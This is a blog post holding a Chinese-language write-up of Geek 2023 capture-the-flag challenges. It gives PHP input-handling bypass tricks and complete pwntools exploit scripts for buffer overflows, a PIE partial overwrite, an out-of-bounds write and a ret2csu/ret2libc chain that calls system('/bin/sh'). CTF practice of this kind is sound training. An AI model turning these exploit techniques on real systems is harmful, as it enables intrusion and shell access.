<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="好耶，又来练习pwn  WEB web懒得复现了，尤记几个点   php5特性: 如果intval函数参数填入科学计数法的字符串，会以e前面的数字作为返回值；但是如果先科学计数法+数字，此时会先将科学计数法变为正常的数再进行加法运算，之后才传入intval()进行转换; php参数里不能有. ，会被自动换为_，但是这个操作只换一个：SYC_GEEK.2023 &#x3D;&gt; SYC[GEEK.202">
<meta property="og:type" content="article">
<meta property="og:title" content="NS - Geek 2023 Web &amp; PWN">
<meta property="og:url" content="http://w1mps.github.io/2023/10/27/Geek%202023/index.html">
<meta property="og:site_name" content="Trashbox 4 outx!">
<meta property="og:description" content="好耶，又来练习pwn  WEB web懒得复现了，尤记几个点   php5特性: 如果intval函数参数填入科学计数法的字符串，会以e前面的数字作为返回值；但是如果先科学计数法+数字，此时会先将科学计数法变为正常的数再进行加法运算，之后才传入intval()进行转换; php参数里不能有. ，会被自动换为_，但是这个操作只换一个：SYC_GEEK.2023 &#x3D;&gt; SYC[GEEK.202">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2023-10-27T02:39:40.000Z">
<meta property="article:modified_time" content="2023-11-01T07:44:01.794Z">
<meta property="article:author" content="outx">
<meta property="article:tag" content="CTF">
<meta property="article:tag" content="PWN">
<meta property="article:tag" content="WEB">
<meta name="twitter:card" content="summary">
    
    
      
        
          <link rel="shortcut icon" href="https://blog-1253481369.cos.ap-chengdu.myqcloud.com/img/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>NS - Geek 2023 Web &amp; PWN</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 5.4.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" "Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/paper/">Paper</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post " href="/2023/12/11/Buuctf%20MISC%20Part/"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post " href="/2023/10/21/SCCTF2023/"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top " href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post " href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://w1mps.github.io/2023/10/27/Geek%202023/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://w1mps.github.io/2023/10/27/Geek%202023/&text=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://w1mps.github.io/2023/10/27/Geek%202023/&is_video=false&description=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=NS - Geek 2023 Web &amp; PWN&body=Check out this article: http://w1mps.github.io/2023/10/27/Geek%202023/"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://w1mps.github.io/2023/10/27/Geek%202023/&name=NS - Geek 2023 Web &amp; PWN&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://w1mps.github.io/2023/10/27/Geek%202023/&t=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">2.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nc-pwntools"><span class="toc-number">2.1.</span> <span class="toc-text">nc_pwntools</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#password"><span class="toc-number">2.2.</span> <span class="toc-text">password</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ret2text"><span class="toc-number">2.3.</span> <span class="toc-text">ret2text</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#write1"><span class="toc-number">2.4.</span> <span class="toc-text">write1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ret2libc"><span class="toc-number">2.5.</span> <span class="toc-text">ret2libc</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        NS - Geek 2023 Web &amp; PWN
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">outx</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2023-10-27T02:39:40.000Z" itemprop="datePublished">2023-10-27</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/Notes/">Notes</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link-link" href="/tags/CTF/" rel="tag">CTF</a>, <a class="tag-link-link" href="/tags/PWN/" rel="tag">PWN</a>, <a class="tag-link-link" href="/tags/WEB/" rel="tag">WEB</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <blockquote>
<p>好耶，又来练习pwn</p>
</blockquote>
<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><blockquote>
<p>web懒得复现了，尤记几个点</p>
</blockquote>
<ol>
<li>php5特性: 如果intval函数参数填入科学计数法的字符串，会以e前面的数字作为返回值；但是如果先科学计数法+数字，此时会先将科学计数法变为正常的数再进行加法运算，之后才传入intval()进行转换;</li>
<li>php参数里不能有<code>.</code> ，会被自动换为<code>_</code>，但是这个操作只换一个：<code>SYC_GEEK.2023 =&gt; SYC[GEEK.2023</code> 绕过。</li>
</ol>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="nc-pwntools"><a href="#nc-pwntools" class="headerlink" title="nc_pwntools"></a>nc_pwntools</h3><p>考察pwntools使用</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">io = remote(<span class="string">&#x27;pwn.node.game.sycsec.com&#x27;</span>, <span class="number">31152</span>)</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&#x27;!!!&#x27;</span>)</span><br><span class="line">io.send(<span class="string">b&quot;a&quot;</span>*<span class="number">92</span>+<span class="string">b&quot;Syclover&quot;</span>)</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&quot;first one\n&quot;</span>)</span><br><span class="line">eval_str = io.recvline().replace(<span class="string">b&#x27;=?\n&#x27;</span>,<span class="string">b&#x27;&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(eval_str)</span><br><span class="line">io.sendline(<span class="built_in">str</span>(<span class="built_in">eval</span>(eval_str)).encode())</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="password"><a href="#password" class="headerlink" title="password"></a>password</h3><p>考了strcmp的一个trick，<code>\x00</code>会截断，密码概率为空，剩下的就简单了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&quot;debug&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        io = remote(<span class="string">&#x27;pwn.node.game.sycsec.com&#x27;</span>, <span class="number">30351</span>, timeout=<span class="number">2</span>)</span><br><span class="line">        <span class="comment"># io = process(&#x27;./password&#x27;)</span></span><br><span class="line">        io.recvline()</span><br><span class="line">        payload = <span class="string">b&#x27;a&#x27;</span> * <span class="number">40</span> + p64(<span class="number">0x00000000004012F3</span>)</span><br><span class="line">        io.send(payload)</span><br><span class="line">        io.recvline(timeout=<span class="number">2</span>)</span><br><span class="line">        io.sendline(<span class="string">b&#x27;&#x27;</span>)</span><br><span class="line">        res = io.recvline(timeout=<span class="number">2</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="string">b&#x27;Correct&#x27;</span> <span class="keyword">in</span> res:</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        io.close()</span><br><span class="line">        time.sleep(<span class="number">0.1</span>)</span><br><span class="line">    <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">        exit()</span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        <span class="keyword">pass</span></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="ret2text"><a href="#ret2text" class="headerlink" title="ret2text"></a>ret2text</h3><p>开了PIE，且没法泄漏地址，但是可以覆盖一字节</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="comment"># io = process(&#x27;./ret2text&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;pwn.node.game.sycsec.com&#x27;</span>, <span class="number">31533</span>)</span><br><span class="line"></span><br><span class="line">io.recvline()</span><br><span class="line">payload = <span class="string">b&#x27;A&#x27;</span>*<span class="number">0x58</span> + <span class="string">b&#x27;\x27&#x27;</span></span><br><span class="line"></span><br><span class="line">io.send(payload)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="write1"><a href="#write1" class="headerlink" title="write1"></a>write1</h3><p>这题需要算ret地址的偏移，然后利用数组越界写过去</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="comment"># io = process(&#x27;./chal&#x27;)</span></span><br><span class="line">io = remote(<span class="string">&#x27;pwn.node.game.sycsec.com&#x27;</span>, <span class="number">31043</span>)</span><br><span class="line">context.log_level = <span class="string">&#x27;debug&#x27;</span></span><br><span class="line"></span><br><span class="line">pause()</span><br><span class="line"><span class="comment"># io.recvline()</span></span><br><span class="line">io.sendline(<span class="string">b&#x27;AAAAAAAA&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvline()</span><br><span class="line">io.sendline(<span class="string">b&#x27;40&#x27;</span>)</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(<span class="string">b&#x27;-2b&#x27;</span>)</span><br><span class="line">io.recvline()</span><br><span class="line">io.sendline(<span class="string">b&#x27;41&#x27;</span>)</span><br><span class="line">io.recv()</span><br><span class="line">io.sendline(<span class="string">b&#x27;-01&#x27;</span>)</span><br><span class="line"></span><br><span class="line">io.recvline()</span><br><span class="line">io.sendline(<span class="string">b&#x27;-1&#x27;</span>)</span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="ret2libc"><a href="#ret2libc" class="headerlink" title="ret2libc"></a>ret2libc</h3><p>这题本地通了，死活线上打不通，思路就是write泄漏libc地址，然后构造rop打shell。后面经过师傅的指点，可以用csu控制rdx（线上可能rdx值被加料改0了，导致输出不了），又学一招，开心</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">&#x27;DEBUG&#x27;</span></span><br><span class="line"></span><br><span class="line">io = process(<span class="string">&quot;./chal&quot;</span>)</span><br><span class="line">libc = ELF(<span class="string">&quot;./libc.so.6.local&quot;</span>)</span><br><span class="line"><span class="comment"># io = remote(&quot;pwn.node.game.sycsec.com&quot;, 30819)</span></span><br><span class="line"><span class="comment"># libc = ELF(&quot;./libc.so.6&quot;)</span></span><br><span class="line"></span><br><span class="line">elf = ELF(<span class="string">&quot;./chal&quot;</span>)</span><br><span class="line">pause()</span><br><span class="line">io.recvuntil(<span class="string">b&quot;backdoor!&quot;</span>)</span><br><span class="line">write_plt = elf.plt[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">write_got = elf.got[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line"></span><br><span class="line">vuln = <span class="number">0x4011FD</span></span><br><span class="line">pop_rbx = <span class="number">0x40132A</span></span><br><span class="line">mov_rdx = <span class="number">0x401310</span></span><br><span class="line">pop_rdi = <span class="number">0x0000000000401333</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">ret2csu</span>(<span class="params">rbx,rbp,r12,r13,r14,r15</span>):</span></span><br><span class="line">    payload = <span class="string">b&quot;bbb\x00&quot;</span> + <span class="string">b&quot;a&quot;</span> * <span class="number">20</span></span><br><span class="line">    payload += p64(pop_rbx)</span><br><span class="line">    payload += p64(rbx)</span><br><span class="line">    payload += p64(rbp)</span><br><span class="line">    payload += p64(r12) <span class="comment"># rdi</span></span><br><span class="line">    payload += p64(r13) <span class="comment"># rsi</span></span><br><span class="line">    payload += p64(r14) <span class="comment"># rdx</span></span><br><span class="line">    payload += p64(r15) <span class="comment"># call vuln</span></span><br><span class="line">    payload += p64(mov_rdx)</span><br><span class="line">    payload += <span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x8</span>+<span class="number">8</span>*<span class="number">6</span>) <span class="comment"># 会再经过一轮pop，保持栈平衡</span></span><br><span class="line">    payload += p64(vuln)</span><br><span class="line">    io.sendline(payload)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">ret2csu(<span class="number">0</span>, <span class="number">1</span>, <span class="number">1</span>, write_got, <span class="number">8</span>, write_got) <span class="comment">#write(fd=1, buf=write_got, count=8)</span></span><br><span class="line"></span><br><span class="line">write_got_addr = u64(io.recv(<span class="number">6</span>).ljust(<span class="number">8</span>, <span class="string">b&quot;\x00&quot;</span>))</span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;write_got_addr: %s&quot;</span> % <span class="built_in">hex</span>(write_got_addr))</span><br><span class="line">libcbase = write_got_addr - libc.symbols[<span class="string">&#x27;write&#x27;</span>]</span><br><span class="line">system_addr = libcbase + libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">bin_sh_addr = libcbase + <span class="built_in">next</span>(libc.search(<span class="string">b&quot;/bin/sh&quot;</span>))</span><br><span class="line"></span><br><span class="line">io.recvuntil(<span class="string">b&quot;backdoor!&quot;</span>)</span><br><span class="line">payload2 = <span class="string">b&quot;bbb\x00&quot;</span> + <span class="string">b&quot;a&quot;</span> * <span class="number">20</span> + p64(pop_rdi+<span class="number">1</span>) + p64(pop_rdi) + p64(bin_sh_addr) + p64(system_addr)</span><br><span class="line">io.sendline(payload2)</span><br><span class="line"></span><br><span class="line">io.interactive()</span><br></pre></td></tr></table></figure>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/paper/">Paper</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#WEB"><span class="toc-number">1.</span> <span class="toc-text">WEB</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PWN"><span class="toc-number">2.</span> <span class="toc-text">PWN</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#nc-pwntools"><span class="toc-number">2.1.</span> <span class="toc-text">nc_pwntools</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#password"><span class="toc-number">2.2.</span> <span class="toc-text">password</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ret2text"><span class="toc-number">2.3.</span> <span class="toc-text">ret2text</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#write1"><span class="toc-number">2.4.</span> <span class="toc-text">write1</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ret2libc"><span class="toc-number">2.5.</span> <span class="toc-text">ret2libc</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://w1mps.github.io/2023/10/27/Geek%202023/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://w1mps.github.io/2023/10/27/Geek%202023/&text=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://w1mps.github.io/2023/10/27/Geek%202023/&is_video=false&description=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=NS - Geek 2023 Web &amp; PWN&body=Check out this article: http://w1mps.github.io/2023/10/27/Geek%202023/"><i class="fas fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://w1mps.github.io/2023/10/27/Geek%202023/&title=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://w1mps.github.io/2023/10/27/Geek%202023/&name=NS - Geek 2023 Web &amp; PWN&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://w1mps.github.io/2023/10/27/Geek%202023/&t=NS - Geek 2023 Web &amp; PWN"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fas fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fas fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fas fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <!-- <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script> -->

    <div class="footer-center">
      Copyright &copy;
      
      
      2021-2024
      Powered by
      outx
      <!-- (<span id="busuanzi_value_site_pv"></span>) -->
    </div>
  
  <div class="footer-right">
    <nav>
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/paper/">Paper</a></li>
         
          <li><a href="/archives/">Archives</a></li>
         
          <li><a href="/categories/">Categories</a></li>
         
          <li><a href="/tags/">Tags</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </nav>
  </div>
  <br>

</footer>


    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.2/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->
 
  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script> 




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script> 
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="far fa-clone"></i>';
    btn += '</span>'; 
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Google Analytics -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Umami Analytics -->

<!-- Disqus Comments -->


</body>
</html>
